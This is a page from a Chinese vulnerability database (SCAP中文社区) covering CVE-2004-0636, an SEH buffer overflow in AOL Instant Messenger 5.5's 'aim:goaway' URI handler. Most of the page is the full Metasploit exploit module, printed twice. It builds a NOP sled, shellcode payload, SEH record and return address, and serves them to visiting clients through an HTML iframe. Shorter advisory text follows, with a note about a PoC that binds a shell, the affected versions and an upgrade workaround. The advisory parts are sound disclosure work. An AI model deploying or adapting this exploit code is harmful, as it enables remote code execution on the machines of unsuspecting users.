	# This module acts as an HTTP server and exploits an SEH overwrite
	#
	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AOL Instant Messenger goaway Overflow',
			'Description'    => %q{
					This module exploits a flaw in the handling of AOL Instant
				Messenger's 'goaway' URI handler.  An attacker can execute
				arbitrary code by supplying a overly sized buffer as the
				'message' parameter.  This issue is known to affect AOL Instant
				Messenger 5.5.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'skape',
					'thief <thief@hick.org>'
				],
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					[ 'CVE', '2004-0636' ],
					[ 'OSVDB', '8398'    ],
					[ 'BID', '10889'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],
				],
			'Payload'        =>
				{
					'Space'    => 1014,
					'MaxNops'  => 1014,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows NT/2000/XP/2003 Automatic',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x1108118f, # proto.com: pop/pop/ret
								],
						},
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 09 2004'))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Build out the message
		msg =
			make_nops(1014 - p.encoded.length) +     # NOP sled before the payload
			p.encoded +                              # store the payload
			generate_seh_record(target['Rets'][0]) + # set up the SEH frame
			"\x90\xe9\x13\xfc\xff\xff"               # jmp -1000

		# Build the HTML content
		content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
		

- 漏洞信息 (F83145)

AOL Instant Messenger goaway Overflow (PacketStormID:F83145)
2009-11-26 00:00:00
skape,thief  metasploit.com
exploit,arbitrary
CVE-2004-0636
[点击下载]

This Metasploit module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying a overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server and exploits an SEH overwrite
	#
	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AOL Instant Messenger goaway Overflow',
			'Description'    => %q{
				This module exploits a flaw in the handling of AOL Instant
				Messenger's 'goaway' URI handler.  An attacker can execute 
				arbitrary code by supplying a overly sized buffer as the 
				'message' parameter.  This issue is known to affect AOL Instant 
				Messenger 5.5.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'skape', 
					'thief <thief@hick.org>' 
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'CVE', '2004-0636' ],
					[ 'OSVDB', '8398'    ],
					[ 'BID', '10889'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],
				],
			'Payload'        =>
				{
					'Space'    => 1014,
					'MaxNops'  => 1014,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# Target 0: Automatic
					[
						'Windows NT/2000/XP/2003 Automatic',
						{
							'Platform' => 'win',
							'Rets'     =>
								[
									0x1108118f, # proto.com: pop/pop/ret
								],
						},
					],
				],
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Build out the message
		msg = 
			make_nops(1014 - p.encoded.length) +     # NOP sled before the payload
			p.encoded +                              # store the payload
			generate_seh_record(target['Rets'][0]) + # set up the SEH frame
			"\x90\xe9\x13\xfc\xff\xff"               # jmp -1000

		# Build the HTML content
		content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- 漏洞信息 (F34053)

aimAway.c (PacketStormID:F34053)
2004-08-14 00:00:00
mandragore  
exploit,shell,local,proof of concept
CVE-2004-0636
[点击下载]

Local proof of concept exploit for AIM 5.5.3595 that makes use of the Away Message vulnerability. Binds a shell to port 1180.

- 漏洞信息

8398
AOL Instant Messenger (AIM) aim:goaway URI Handler goaway Function Away Message Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Upgrade
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in AOL Instant Messenger. Instant Messenger fails to correctly limit the size of the value passed to the goaway function in the away feature resulting in a buffer overflow. A malicous user can create a specially crafted URI link that uses the 'aim:' handler and a long message value for the goaway parameter and post the link to a webpage or email. When a victim clicks on this link, or views an html document that invokes this link (such as <iframe>), the code included in the malicious URI may overwrite a Structured Exception Handler pointer which may be used to insert arbitrary code onto the stack. Once on the stack, the arbitrary code could then be executed resulting in a loss of integrity.

- 时间线

2004-08-09 2004-06-16
2004-08-09 Unknow

- 解决方案

Upgrade to version 5.9 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Delete the registry key HKEY_CLASSES_ROOT\aim. This will only effect the current session and the key will be restored the next time AOL Instant Messenger is started at which time the workaround will need to be reapplied.

- 相关参考

- 漏洞作者

- 漏洞信息

AOL Instant Messenger Away Message Remote Buffer Overflow Vulnerability
Boundary Condition Error 10889
Yes No
2004-08-09 12:00:00 2009-07-12 06:16:00
Discovery is credited to Ryan McGeehan and Kevin Benes. Matt Murphy is credited with discovery as well.

- 受影响的程序版本

AOL Instant Messenger 5.5.3595
AOL Instant Messenger 5.5.3415 Beta
AOL Instant Messenger 5.5

- 漏洞讨论

AOL Instant Messenger is reported prone to a remote buffer overflow vulnerability when processing a malformed 'Away' message. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access.

AOL Instant Messenger versions 5.5.3595 and 5.5 are reported vulnerable to this issue, however, other versions may be affected as well.

- 漏洞利用

Proof of concept code has been published. John Bissell A.K.A. HighT1mes has also released an exploit designed to leverage this issue.

An exploit has been released as part of the MetaSploit Framework 2.3.

- 解决方案

AOL has released a new version of Instant Messenger to address this issue. Instant Messenger versions released on and subsequent to August 9, 2004 are not vulnerable.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站